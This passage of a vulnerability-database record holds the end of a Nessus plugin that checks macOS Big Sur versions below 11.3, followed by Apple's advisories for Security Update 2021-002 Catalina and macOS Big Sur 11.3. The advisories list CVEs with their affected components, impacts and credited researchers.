\"CVE-2021-1859\",\n \"CVE-2021-1860\",\n \"CVE-2021-1861\",\n \"CVE-2021-1867\",\n \"CVE-2021-1868\",\n \"CVE-2021-1872\",\n \"CVE-2021-1873\",\n \"CVE-2021-1875\",\n \"CVE-2021-1876\",\n \"CVE-2021-1878\",\n \"CVE-2021-1880\",\n \"CVE-2021-1881\",\n \"CVE-2021-1882\",\n \"CVE-2021-1883\",\n \"CVE-2021-1884\",\n \"CVE-2021-1885\",\n \"CVE-2021-30652\",\n \"CVE-2021-30653\",\n \"CVE-2021-30655\",\n \"CVE-2021-30657\",\n \"CVE-2021-30658\",\n \"CVE-2021-30659\",\n \"CVE-2021-30660\",\n \"CVE-2021-30661\"\n );\n script_xref(name:\"APPLE-SA\", value:\"HT212325\");\n script_xref(name:\"APPLE-SA\", value:\"APPLE-SA-2021-04-26-2\");\n script_xref(name:\"IAVA\", value:\"2021-A-0202-S\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2021/11/17\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2021-0025\");\n\n script_name(english:\"macOS 11.x < 11.3 (HT212325)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote host is missing a macOS security update.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote host is running a version of macOS / Mac OS X that is 11.x prior to 11.3 Big Sur. It is, therefore,\naffected by multiple vulnerabilities including the following:\n\n - A memory corruption issue which could allow an application restricted memory read access (CVE-2021-1808).\n\n - A memory corruption issue which could allow an application to cause unexpected system termination or to \n write kernel memory (CVE-2021-1828).\n\n - An out-of-bounds wirte issue which could allow a malicious application to execute arbitrary code with \n kernel privileges (CVE-2021-1834).\n\nNote that Nessus has not tested for this issue but has instead relied only on the operating system's self-reported\nversion number.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.apple.com/en-us/HT212325\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to macOS 11.3 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-30655\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'macOS Gatekeeper check bypass');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2021/04/26\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/04/26\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/04/28\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:apple:mac_os_x\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:apple:macos\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"MacOS X Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2021-2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_ports(\"Host/MacOSX/Version\", \"Host/local_checks_enabled\", \"Host/MacOSX/packages/boms\");\n\n exit(0);\n}\n\ninclude('vcf.inc');\ninclude('vcf_extras_apple.inc');\n\nvar app_info = vcf::apple::macos::get_app_info();\nvar constraints = [{ 'min_version' : '11.0', 'fixed_version' : '11.3', 'fixed_display' : 'macOS Big Sur 11.3' }];\n\nvcf::apple::macos::check_version_and_report(\n app_info:app_info, \n constraints:constraints, \n severity:SECURITY_HOLE\n);\n", "cvss": {"score": 0.0, "vector": "NONE"}}], "apple": [{"lastseen": "2023-07-25T06:07:00", "description": "# About the security content of Security Update 2021-002 Catalina\n\nThis document describes the security content of Security Update 2021-002 Catalina.\n\n## About Apple security updates\n\nFor our customers' protection, Apple doesn't disclose, discuss, or confirm security issues until an investigation has occurred and patches or releases are available. Recent releases are listed on the [Apple security updates](<https://support.apple.com/kb/HT201222>) page.\n\nApple security documents reference vulnerabilities by [CVE-ID](<http://cve.mitre.org/about/>) when possible.\n\nFor more information about security, see the [Apple Product Security](<https://support.apple.com/kb/HT201220>) page.\n\n![](/library/content/dam/edam/applecare/images/en_US/mac_apps/itunes/divider.png)\n\n## Security Update 2021-002 Catalina\n\nReleased April 26, 2021\n\n**APFS**\n\nAvailable for: macOS Catalina\n\nImpact: A local user may be able to read arbitrary files\n\nDescription: The issue was addressed with improved permissions logic.\n\nCVE-2021-1797: Thomas Tempelmann\n\n**Archive Utility**\n\nAvailable for: macOS Catalina\n\nImpact: A malicious application may bypass Gatekeeper checks\n\nDescription: A logic issue was addressed with improved state management.\n\nCVE-2021-1810: Rasmus Sten (@pajp) of F-Secure\n\n**Audio**\n\nAvailable for: macOS Catalina\n\nImpact: An application may be able to read restricted memory\n\nDescription: A memory corruption issue was addressed with improved validation.\n\nCVE-2021-1808: JunDong Xie of Ant Security Light-Year Lab\n\n**CFNetwork**\n\nAvailable for: macOS Catalina\n\nImpact: Processing maliciously crafted web content may disclose sensitive user information\n\nDescription: A memory initialization issue was addressed with improved memory handling.\n\nCVE-2021-1857: an anonymous researcher\n\n**CoreAudio**\n\nAvailable for: macOS Catalina\n\nImpact: A malicious application may be able to read restricted memory\n\nDescription: A memory corruption issue was addressed with improved validation.\n\nCVE-2021-1809: JunDong Xie of Ant Security Light-Year Lab\n\n**CoreAudio**\n\nAvailable for: macOS Catalina\n\nImpact: An out-of-bounds read was addressed with improved input validation\n\nDescription: Processing a maliciously crafted audio file may disclose restricted memory.\n\nCVE-2021-1846: JunDong Xie of Ant Security Light-Year Lab\n\nEntry added July 21, 2021\n\n**CoreGraphics**\n\nAvailable for: macOS Catalina\n\nImpact: Opening a maliciously crafted file may lead to unexpected application termination or arbitrary code execution\n\nDescription: A memory corruption issue was addressed with improved validation.\n\nCVE-2021-1847: Xuwei Liu of Purdue University\n\n**CoreText**\n\nAvailable for: macOS Catalina\n\nImpact: Processing a maliciously crafted font may result in the disclosure of process memory\n\nDescription: A logic issue was addressed with improved state management.\n\nCVE-2021-1811: Xingwei Lin of Ant Security Light-Year Lab\n\n**curl**\n\nAvailable for: macOS Catalina\n\nImpact: A malicious server may be able to disclose active services\n\nDescription: This issue was addressed with improved checks.\n\nCVE-2020-8284: Marian Rehak\n\nEntry added May 6, 2021\n\n**curl**\n\nAvailable for: macOS Catalina\n\nImpact: A remote attacker may be able to cause a denial of service\n\nDescription: A buffer overflow was addressed with improved input validation.\n\nCVE-2020-8285: xnynx\n\n**curl**\n\nAvailable for: macOS Catalina\n\nImpact: An attacker may provide a fraudulent OCSP response that would appear valid\n\nDescription: This issue was addressed with improved checks.\n\nCVE-2020-8286: an anonymous researcher\n\n**DiskArbitration**\n\nAvailable for: macOS Catalina\n\nImpact: A malicious application may be able to modify protected parts of the file system\n\nDescription: A permissions issue existed in DiskArbitration. This was addressed with additional ownership checks.\n\nCVE-2021-1784: Mikko Kentt\u00e4l\u00e4 (@Turmio_) of SensorFu, Csaba Fitzl (@theevilbit) of Offensive Security, and an anonymous researcher\n\n**FontParser**\n\nAvailable for: macOS Catalina\n\nImpact: Processing a maliciously crafted font file may lead to arbitrary code execution\n\nDescription: An out-of-bounds read was addressed with improved input validation.\n\nCVE-2021-1881: Hou JingYi (@hjy79425575) of Qihoo 360, an anonymous researcher, Xingwei Lin of Ant Security Light-Year Lab, and Mickey Jin of Trend Micro\n\n**FontParser**\n\nAvailable for: macOS Catalina\n\nImpact: Processing a maliciously crafted font file may lead to arbitrary code execution\n\nDescription: A logic issue was addressed with improved state management.\n\nCVE-2020-27942: an anonymous researcher\n\n**Foundation**\n\nAvailable for: macOS Catalina\n\nImpact: A malicious application may be able to gain root privileges\n\nDescription: A validation issue was addressed with improved logic.\n\nCVE-2021-1813: Cees Elzinga\n\n**Foundation**\n\nAvailable for: macOS Catalina\n\nImpact: An application may be able to gain elevated privileges\n\nDescription: A memory corruption issue was addressed with improved validation.\n\nCVE-2021-1882: Gabe Kirkpatrick (@gabe_k)\n\n**ImageIO**\n\nAvailable for: macOS Catalina\n\nImpact: Processing a maliciously crafted image may lead to arbitrary code execution\n\nDescription: This issue was addressed with improved checks.\n\nCVE-2021-1843: Ye Zhang of Baidu Security\n\n**ImageIO**\n\nAvailable for: macOS Catalina\n\nImpact: An out-of-bounds write issue was addressed with improved bounds checking\n\nDescription: Processing a maliciously crafted image may lead to arbitrary code execution.\n\nCVE-2021-1858: Mickey Jin and Qi Sun of Trend Micro working with Trend Micro's Zero Day Initiative\n\nEntry added July 21, 2021\n\n**Intel Graphics Driver**\n\nAvailable for: macOS Catalina\n\nImpact: A malicious application may be able to execute arbitrary code with kernel privileges\n\nDescription: An out-of-bounds write issue was addressed with improved bounds checking.\n\nCVE-2021-1834: ABC Research s.r.o. working with Trend Micro Zero Day Initiative\n\n**Intel Graphics Driver**\n\nAvailable for: macOS Catalina\n\nImpact: An out-of-bounds write issue was addressed with improved bounds checking\n\nDescription: A malicious application may be able to execute arbitrary code with kernel privileges.\n\nCVE-2021-1841: Jack Dates of RET2 Systems, Inc.\n\nEntry added July 21, 2021\n\n**Kernel**\n\nAvailable for: macOS Catalina\n\nImpact: A malicious application may be able to disclose kernel memory\n\nDescription: A memory initialization issue was addressed with improved memory handling.\n\nCVE-2021-1860: @0xalsr\n\n**Kernel**\n\nAvailable for: macOS Catalina\n\nImpact: An application may be able to execute arbitrary code with kernel privileges\n\nDescription: A logic issue was addressed with improved state management.\n\nCVE-2021-1851: @0xalsr\n\n**Kernel**\n\nAvailable for: macOS Catalina\n\nImpact: A local attacker may be able to elevate their privileges\n\nDescription: A memory corruption issue was addressed with improved validation.\n\nCVE-2021-1840: Zuozhi Fan (@pattern_F_) of Ant Group Tianqiong Security Lab\n\n**Kernel**\n\nAvailable for: macOS Catalina\n\nImpact: The issue was addressed with improved permissions logic\n\nDescription: Copied files may not have the expected file permissions.\n\nCVE-2021-1832: an anonymous researcher\n\nEntry added July 21, 2021\n\n**libxpc**\n\nAvailable for: macOS Catalina\n\nImpact: A malicious application may be able to gain root privileges\n\nDescription: A race condition was addressed with additional validation.\n\nCVE-2021-30652: James Hutchins\n\n**libxslt**\n\nAvailable for: macOS Catalina\n\nImpact: Processing a maliciously crafted file may lead to heap corruption\n\nDescription: A double free issue was addressed with improved memory management.\n\nCVE-2021-1875: Found by OSS-Fuzz\n\n**Login Window**\n\nAvailable for: macOS Catalina\n\nImpact: A malicious application with root privileges may be able to access private information\n\nDescription: This issue was addressed with improved entitlements.\n\nCVE-2021-1824: Wojciech Regu\u0142a (@_r3ggi) of SecuRing\n\n**NSRemoteView**\n\nAvailable for: macOS Catalina\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: A use after free issue was addressed with improved memory management.\n\nCVE-2021-1876: Matthew Denton of Google Chrome\n\n**Preferences**\n\nAvailable for: macOS Catalina\n\nImpact: A local user may be able to modify protected parts of the file system\n\nDescription: A parsing issue in the handling of directory paths was addressed with improved path validation.\n\nCVE-2021-1739: Zhipeng Huo (@R3dF09) and Yuebin Sun (@yuebinsun2020) of Tencent Security Xuanwu Lab (xlab.tencent.com)\n\nCVE-2021-1740: Zhipeng Huo (@R3dF09) and Yuebin Sun (@yuebinsun2020) of Tencent Security Xuanwu Lab (https://xlab.tencent.com)\n\n**smbx**\n\nAvailable for: macOS Catalina\n\nImpact: An attacker in a privileged network position may be able to leak sensitive user information\n\nDescription: An integer overflow was addressed with improved input validation.\n\nCVE-2021-1878: Aleksandar Nikolic of Cisco Talos (talosintelligence.com)\n\n**System Preferences**\n\nAvailable for: macOS Catalina\n\nImpact: A malicious application may bypass Gatekeeper checks. Apple is aware of a report that this issue may have been actively exploited.\n\nDescription: A logic issue was addressed with improved state management.\n\nCVE-2021-30657: Cedric Owens (@cedowens)\n\nEntry added April 27, 2021, updated April 30, 2021 \n\n**Tailspin**\n\nAvailable for: macOS Catalina\n\nImpact: A local attacker may be able to elevate their privileges\n\nDescription: A logic issue was addressed with improved state management.\n\nCVE-2021-1868: Tim Michaud of Zoom Communications\n\n**tcpdump**\n\nAvailable for: macOS Catalina\n\nImpact: A remote attacker may be able to cause a denial of service\n\nDescription: This issue was addressed with improved checks.\n\nCVE-2020-8037: an anonymous researcher\n\n**Time Machine**\n\nAvailable for: macOS Catalina\n\nImpact: A local attacker may be able to elevate their privileges\n\nDescription: The issue was addressed with improved permissions logic.\n\nCVE-2021-1839: Tim Michaud(@TimGMichaud) of Zoom Video Communications and Gary Nield of ECSC Group plc\n\n**Wi-Fi**\n\nAvailable for: macOS Catalina\n\nImpact: An application may be able to cause unexpected system termination or write kernel memory\n\nDescription: A memory corruption issue was addressed with improved validation.\n\nCVE-2021-1828: Zuozhi Fan (@pattern_F_) of Ant Group Tianqiong Security Lab\n\n**Wi-Fi**\n\nAvailable for: macOS Catalina\n\nImpact: The issue was addressed with improved permissions logic\n\nDescription: An application may be able to execute arbitrary code with system privileges.\n\nCVE-2021-30655: Gary Nield of ECSC Group plc and Tim Michaud (@TimGMichaud) of Zoom Video Communications, Wojciech Regu\u0142a (@_r3ggi) of SecuRing\n\nEntry added July 21, 2021\n\n**wifivelocityd**\n\nAvailable for: macOS Catalina\n\nImpact: An application may be able to execute arbitrary code with system privileges\n\nDescription: The issue was addressed with improved permissions logic.\n\nCVE-2020-3838: Dayton Pidhirney (@_watbulb)\n\n**WindowServer**\n\nAvailable for: macOS Catalina\n\nImpact: A malicious application may be able to unexpectedly leak a user's credentials from secure text fields\n\nDescription: An API issue in Accessibility TCC permissions was addressed with improved state management.\n\nCVE-2021-1873: an anonymous researcher\n\nEntry updated April 27, 2021 \n\n![](/library/content/dam/edam/applecare/images/en_US/mac_apps/itunes/divider.png)\n\n## Additional recognition\n\n**CoreCrypto**\n\nWe would like to acknowledge Andy Russon of Orange Group for their assistance.\n\nEntry added May 6, 2021\n\n**Intel Graphics Driver**\n\nWe would like to acknowledge Jack Dates of RET2 Systems, Inc. for their assistance.\n\nEntry added May 6, 2021\n\n**Kernel**\n\nWe would like to acknowledge Antonio Frighetto of Politecnico di Milano, GRIMM, Keyu Man, Zhiyun Qian, Zhongjie Wang, Xiaofeng Zheng, Youjun Huang, Haixin Duan, and an anonymous researcher for their assistance.\n\nEntry added May 6, 2021\n\n**Mail**\n\nWe would like to acknowledge Petter Flink, SecOps of Bonnier News and an anonymous researcher for their assistance.\n\nEntry added May 6, 2021\n\n**Safari**\n\nWe would like to acknowledge an anonymous researcher for their assistance.\n\nEntry added May 6, 2021\n\n**Security**\n\nWe would like to acknowledge Xingwei Lin of Ant Security Light-Year Lab and john (@nyan_satan) for their assistance.\n\nEntry added May 6, 2021\n\nInformation about products not manufactured by Apple, or independent websites not controlled or tested by Apple, is provided without recommendation or endorsement. Apple assumes no responsibility with regard to the selection, performance, or use of third-party websites or products. Apple makes no representations regarding third-party website accuracy or reliability. [Contact the vendor](<http://support.apple.com/kb/HT2693>) for additional information.\n\nPublished Date: July 21, 2021\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-04-26T00:00:00", "type": "apple", "title": "About the security content of Security Update 2021-002 Catalina", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-27942", "CVE-2020-3838", "CVE-2020-8037", "CVE-2020-8284", "CVE-2020-8285", "CVE-2020-8286", "CVE-2021-1739", "CVE-2021-1740", "CVE-2021-1784", "CVE-2021-1797", "CVE-2021-1808", "CVE-2021-1809", "CVE-2021-1810", "CVE-2021-1811", "CVE-2021-1813", "CVE-2021-1824", "CVE-2021-1828", "CVE-2021-1832", "CVE-2021-1834", "CVE-2021-1839", "CVE-2021-1840", "CVE-2021-1841", "CVE-2021-1843", "CVE-2021-1846", "CVE-2021-1847", "CVE-2021-1851", "CVE-2021-1857", "CVE-2021-1858", "CVE-2021-1860", "CVE-2021-1868", "CVE-2021-1873", "CVE-2021-1875", "CVE-2021-1876", "CVE-2021-1878", "CVE-2021-1881", "CVE-2021-1882", "CVE-2021-30652", "CVE-2021-30655", "CVE-2021-30657"], "modified": "2021-04-26T00:00:00", "id": "APPLE:F7DADB3E958148A6B63512580383CEA2", "href": "https://support.apple.com/kb/HT212326", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-06-06T22:02:56", "description": "# About the security content of macOS Big Sur 11.3\n\nThis document describes the security content of macOS Big Sur 11.3.\n\n## About Apple security updates\n\nFor our customers' protection, Apple doesn't disclose, discuss, or confirm security issues until an investigation has occurred and patches or releases are available. Recent releases are listed on the [Apple security updates](<https://support.apple.com/kb/HT201222>) page.\n\nApple security documents reference vulnerabilities by [CVE-ID](<http://cve.mitre.org/about/>) when possible.\n\nFor more information about security, see the [Apple Product Security](<https://support.apple.com/kb/HT201220>) page.\n\n![](/library/content/dam/edam/applecare/images/en_US/mac_apps/itunes/divider.png)\n\n## macOS Big Sur 11.3\n\nReleased April 26, 2021\n\n**APFS**\n\nAvailable for: macOS Big Sur\n\nImpact: A local attacker may be able to elevate their privileges\n\nDescription: A logic issue was addressed with improved state management.\n\nCVE-2021-1853: Gary Nield of ECSC Group plc and Tim Michaud(@TimGMichaud) of Zoom Video Communications\n\n**AppleMobileFileIntegrity**\n\nAvailable for: macOS Big Sur\n\nImpact: A malicious application may be able to bypass Privacy preferences\n\nDescription: An issue in code signature validation was addressed with improved checks.\n\nCVE-2021-1849: Siguza\n\n**Apple Neural Engine**\n\nAvailable for: macOS Big Sur\n\nImpact: A malicious application may be able to execute arbitrary code with kernel privileges\n\nDescription: An out-of-bounds read was addressed with improved input validation.\n\nCVE-2021-1867: Zuozhi Fan (@pattern_F_) and Wish Wu(\u5434\u6f4d\u6d60) of Ant Group Tianqiong Security Lab\n\n**Archive Utility**\n\nAvailable for: macOS Big Sur\n\nImpact: A malicious application may bypass Gatekeeper checks\n\nDescription: A logic issue was addressed with improved state management.\n\nCVE-2021-1810: Rasmus Sten (@pajp) of F-Secure\n\nEntry updated on April 27, 2021 \n\n**Audio**\n\nAvailable for: macOS Big Sur\n\nImpact: An application may be able to read restricted memory\n\nDescription: A memory corruption issue was addressed with improved validation.\n\nCVE-2021-1808: JunDong Xie of Ant Security Light-Year Lab\n\n**CFNetwork**\n\nAvailable for: macOS Big Sur\n\nImpact: Processing maliciously crafted web content may disclose sensitive user information\n\nDescription: A memory initialization issue was addressed with improved memory handling.\n\nCVE-2021-1857: an anonymous researcher\n\n**Compression**\n\nAvailable for: macOS Big Sur\n\nImpact: An out-of-bounds read was addressed with improved input validation\n\nDescription: Processing a maliciously crafted image may lead to arbitrary code execution.\n\nCVE-2021-30752: Ye Zhang (@co0py_Cat) of Baidu Security\n\nEntry added July 21, 2021 \n\n**CoreAudio**\n\nAvailable for: macOS Big Sur\n\nImpact: Processing a maliciously crafted file may lead to arbitrary code execution\n\nDescription: An out-of-bounds write issue was addressed with improved bounds checking.\n\nCVE-2021-30664: JunDong Xie of Ant Security Light-Year Lab\n\nEntry added May 6, 2021\n\n**CoreAudio**\n\nAvailable for: macOS Big Sur\n\nImpact: Processing a maliciously crafted audio file may disclose restricted memory\n\nDescription: An out-of-bounds read was addressed with improved input validation.\n\nCVE-2021-1846: JunDong Xie of Ant Security Light-Year Lab\n\n**CoreAudio**\n\nAvailable for: macOS Big Sur\n\nImpact: A malicious application may be able to read restricted memory\n\nDescription: A memory corruption issue was addressed with improved validation.\n\nCVE-2021-1809: JunDong Xie of Ant Security Light-Year Lab\n\n**CoreFoundation**\n\nAvailable for: macOS Big Sur\n\nImpact: A malicious application may be able to leak sensitive user information\n\nDescription: A validation issue was addressed with improved logic.\n\nCVE-2021-30659: Thijs Alkemade of Computest\n\n**CoreGraphics**\n\nAvailable for: macOS Big Sur\n\nImpact: Opening a maliciously crafted file may lead to unexpected application termination or arbitrary code execution\n\nDescription: A memory corruption issue was addressed with improved validation.\n\nCVE-2021-1847: Xuwei Liu of Purdue University\n\n**CoreText**\n\nAvailable for: macOS Big Sur\n\nImpact: Processing a maliciously crafted font may result in the disclosure of process memory\n\nDescription: A logic issue was addressed with improved state management.\n\nCVE-2021-1811: Xingwei Lin of Ant Security Light-Year Lab\n\n**curl**\n\nAvailable for: macOS Big Sur\n\nImpact: A malicious server may be able to disclose active services\n\nDescription: This issue was addressed with improved checks.\n\nCVE-2020-8284: Marian Rehak\n\nEntry added May 6, 2021\n\n**curl**\n\nAvailable for: macOS Big Sur\n\nImpact: An attacker may provide a fraudulent OCSP response that would appear valid\n\nDescription: This issue was addressed with improved checks.\n\nCVE-2020-8286: an anonymous researcher\n\n**curl**\n\nAvailable for: macOS Big Sur\n\nImpact: A remote attacker may be able to cause a denial of service\n\nDescription: A buffer overflow was addressed with improved input validation.\n\nCVE-2020-8285: xnynx\n\n**DiskArbitration**\n\nAvailable for: macOS Big Sur\n\nImpact: A malicious application may be able to modify protected parts of the file system\n\nDescription: A permissions issue existed in DiskArbitration. This was addressed with additional ownership checks.\n\nCVE-2021-1784: Mikko Kentt\u00e4l\u00e4 (@Turmio_) of SensorFu, Csaba Fitzl (@theevilbit) of Offensive Security, and an anonymous researcher\n\n**FaceTime**\n\nAvailable for: macOS Big Sur\n\nImpact: Muting a CallKit call while ringing may not result in mute being enabled\n\nDescription: A logic issue was addressed with improved state management.\n\nCVE-2021-1872: Siraj Zaneer of Facebook\n\n**FontParser**\n\nAvailable for: macOS Big Sur\n\nImpact: Processing a maliciously crafted font file may lead to arbitrary code execution\n\nDescription: An out-of-bounds read was addressed with improved input validation.\n\nCVE-2021-1881: an anonymous researcher, Xingwei Lin of Ant Security Light-Year Lab, Mickey Jin of Trend Micro, and Hou JingYi (@hjy79425575) of Qihoo 360\n\n**Foundation**\n\nAvailable for: macOS Big Sur\n\nImpact: An application may be able to gain elevated privileges\n\nDescription: A memory corruption issue was addressed with improved validation.\n\nCVE-2021-1882: Gabe Kirkpatrick (@gabe_k)\n\n**Foundation**\n\nAvailable for: macOS Big Sur\n\nImpact: A malicious application may be able to gain root privileges\n\nDescription: A validation issue was addressed with improved logic.\n\nCVE-2021-1813: Cees Elzinga\n\n**Heimdal**\n\nAvailable for: macOS Big Sur\n\nImpact: Processing maliciously crafted server messages may lead to heap corruption\n\nDescription: This issue was addressed with improved checks.\n\nCVE-2021-1883: Gabe Kirkpatrick (@gabe_k)\n\n**Heimdal**\n\nAvailable for: macOS Big Sur\n\nImpact: A remote attacker may be able to cause a denial of service\n\nDescription: A race condition was addressed with improved locking.\n\nCVE-2021-1884: Gabe Kirkpatrick (@gabe_k)\n\n**ImageIO**\n\nAvailable for: macOS Big Sur\n\nImpact: Processing a maliciously crafted image may lead to arbitrary code execution\n\nDescription: This issue was addressed with improved checks.\n\nCVE-2021-1880: Xingwei Lin of Ant Security Light-Year Lab\n\nCVE-2021-30653: Ye Zhang of Baidu Security\n\nCVE-2021-1814: Ye Zhang of Baidu Security, Mickey Jin & Qi Sun of Trend Micro, and Xingwei Lin of Ant Security Light-Year Lab\n\nCVE-2021-1843: Ye Zhang of Baidu Security\n\n**ImageIO**\n\nAvailable for: macOS Big Sur\n\nImpact: Processing a maliciously crafted image may lead to arbitrary code execution\n\nDescription: An out-of-bounds read was addressed with improved bounds checking.\n\nCVE-2021-1885: CFF of Topsec Alpha Team\n\n**ImageIO**\n\nAvailable for: macOS Big Sur\n\nImpact: Processing a maliciously crafted image may lead to arbitrary code execution\n\nDescription: An out-of-bounds write issue was addressed with improved bounds checking.\n\nCVE-2021-1858: Mickey Jin of Trend Micro\n\n**ImageIO**\n\nAvailable for: macOS Big Sur\n\nImpact: An out-of-bounds write was addressed with improved input validation\n\nDescription: Processing a maliciously crafted image may lead to arbitrary code execution.\n\nCVE-2021-30743: Ye Zhang (@co0py_Cat) of Baidu Security, CFF of Topsec Alpha Team, Jzhu working with Trend Micro Zero Day Initiative, Xingwei Lin of Ant Security Light-Year Lab, CFF of Topsec Alpha Team, Jeonghoon Shin (@singi21a) of THEORI working with Trend Micro Zero Day Initiative\n\nEntry added July 21, 2021 \n\n**Installer**\n\nAvailable for: macOS Big Sur\n\nImpact: A malicious application may bypass Gatekeeper checks\n\nDescription: This issue was addressed with improved handling of file metadata.\n\nCVE-2021-30658: Wojciech Regu\u0142a (@_r3ggi) of SecuRing\n\n**Intel Graphics Driver**\n\nAvailable for: macOS Big Sur\n\nImpact: A malicious application may be able to execute arbitrary code with kernel privileges\n\nDescription: An out-of-bounds write issue was addressed with improved bounds checking.\n\nCVE-2021-1841: Jack Dates of RET2 Systems, Inc.\n\nCVE-2021-1834: ABC Research s.r.o. working with Trend Micro Zero Day Initiative\n\n**Kernel**\n\nAvailable for: macOS Big Sur\n\nImpact: A malicious application may be able to disclose kernel memory\n\nDescription: A memory initialization issue was addressed with improved memory handling.\n\nCVE-2021-1860: @0xalsr\n\n**Kernel**\n\nAvailable for: macOS Big Sur\n\nImpact: A local attacker may be able to elevate their privileges\n\nDescription: A memory corruption issue was addressed with improved validation.\n\nCVE-2021-1840: Zuozhi Fan (@pattern_F_) of Ant Group Tianqiong Security Lab\n\n**Kernel**\n\nAvailable for: macOS Big Sur\n\nImpact: An application may be able to execute arbitrary code with kernel privileges\n\nDescription: A logic issue was addressed with improved state management.\n\nCVE-2021-1851: @0xalsr\n\n**Kernel**\n\nAvailable for: macOS Big Sur\n\nImpact: Copied files may not have the expected file permissions\n\nDescription: The issue was addressed with improved permissions logic.\n\nCVE-2021-1832: an anonymous researcher\n\n**Kernel**\n\nAvailable for: macOS Big Sur\n\nImpact: A malicious application may be able to disclose kernel memory\n\nDescription: An out-of-bounds read was addressed with improved bounds checking.\n\nCVE-2021-30660: Alex Plaskett\n\n**libxpc**\n\nAvailable for: macOS Big Sur\n\nImpact: A malicious application may be able to gain root privileges\n\nDescription: A race condition was addressed with additional validation.\n\nCVE-2021-30652: James Hutchins\n\n**libxslt**\n\nAvailable for: macOS Big Sur\n\nImpact: Processing a maliciously crafted file may lead to heap corruption\n\nDescription: A double free issue was addressed with improved memory management.\n\nCVE-2021-1875: Found by OSS-Fuzz\n\n**Login Window**\n\nAvailable for: macOS Big Sur\n\nImpact: A malicious application with root privileges may be able to access private information\n\nDescription: This issue was addressed with improved entitlements.\n\nCVE-2021-1824: Wojciech Regu\u0142a (@_r3ggi) of SecuRing\n\n**Notes**\n\nAvailable for: macOS Big Sur\n\nImpact: Locked Notes content may have been unexpectedly unlocked\n\nDescription: A logic issue was addressed with improved state management.\n\nCVE-2021-1859: Syed Ali Shuja (@SyedAliShuja) of Colour King Pvt. Ltd\n\n**NSRemoteView**\n\nAvailable for: macOS Big Sur\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: A use after free issue was addressed with improved memory management.\n\nCVE-2021-1876: Matthew Denton of Google Chrome\n\n**Preferences**\n\nAvailable for: macOS Big Sur\n\nImpact: A local user may be able to modify protected parts of the file system\n\nDescription: A parsing issue in the handling of directory paths was addressed with improved path validation.\n\nCVE-2021-1815: Zhipeng Huo (@R3dF09) and Yuebin Sun (@yuebinsun2020) of Tencent Security Xuanwu Lab (xlab.tencent.com)\n\nCVE-2021-1739: Zhipeng Huo (@R3dF09) and Yuebin Sun (@yuebinsun2020) of Tencent Security Xuanwu Lab (xlab.tencent.com)\n\nCVE-2021-1740: Zhipeng Huo (@R3dF09) and Yuebin Sun (@yuebinsun2020) of Tencent Security Xuanwu Lab (xlab.tencent.com)\n\n**Safari**\n\nAvailable for: macOS Big Sur\n\nImpact: A malicious website may be able to track users by setting state in a cache\n\nDescription: An issue existed in determining cache occupancy. The issue was addressed through improved logic.\n\nCVE-2021-1861: Konstantinos Solomos of University of Illinois at Chicago\n\n**Safari**\n\nAvailable for: macOS Big Sur\n\nImpact: A malicious website may be able to force unnecessary network connections to fetch its favicon\n\nDescription: A logic issue was addressed with improved state management.\n\nCVE-2021-1855: H\u00e5vard Mikkelsen Ottestad of HASMAC AS\n\n**SampleAnalysis**\n\nAvailable for: macOS Big Sur\n\nImpact: A local attacker may be able to elevate their privileges\n\nDescription: A logic issue was addressed with improved state management.\n\nCVE-2021-1868: Tim Michaud of Zoom Communications\n\n**Sandbox**\n\nAvailable for: macOS Big Sur\n\nImpact: A malicious application may be able to access the user's recent contacts\n\nDescription: The issue was addressed with improved permissions logic.\n\nCVE-2021-30750: Csaba Fitzl (@theevilbit) of Offensive 